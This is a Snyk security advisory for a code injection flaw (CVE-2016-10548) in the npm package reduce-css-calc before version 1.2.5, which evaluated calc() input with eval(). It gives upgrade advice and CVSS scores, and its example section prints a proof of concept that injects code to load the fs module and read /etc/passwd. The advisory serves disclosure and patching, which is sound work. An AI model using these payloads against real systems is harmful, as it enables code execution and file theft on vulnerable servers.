Homepage
About Snyk

Arbitrary Code Injection Affecting reduce-css-calc package, versions <1.2.5

Severity

 Recommended
0.0
medium
0
10

CVSS assessment made by Snyk's Security Team

    Threat Intelligence

    EPSS
    0.19% (57th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID npm:reduce-css-calc:20160913
  • published 17 Oct 2016
  • disclosed 20 Aug 2016
  • credit Сковорода Никита Андреевич (ChALkeR)
Report a new vulnerability Found a mistake?

Introduced: 20 Aug 2016

CVE-2016-10548 Open this link in a new tab
CWE-94 Open this link in a new tab

How to fix?

Upgrade reduce-css-calc version 1.2.5 or greater.

Overview

reduce-css-calc is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval() for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.

Example

The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));

CVSS Scores

version 3.1
Expand this section

Snyk

6.1 medium
  • Attack Vector (AV)
    Network
  • Attack Complexity (AC)
    Low
  • Privileges Required (PR)
    None
  • User Interaction (UI)
    Required
  • Scope (S)
    Changed
  • Confidentiality (C)
    Low
  • Integrity (I)
    Low
  • Availability (A)
    None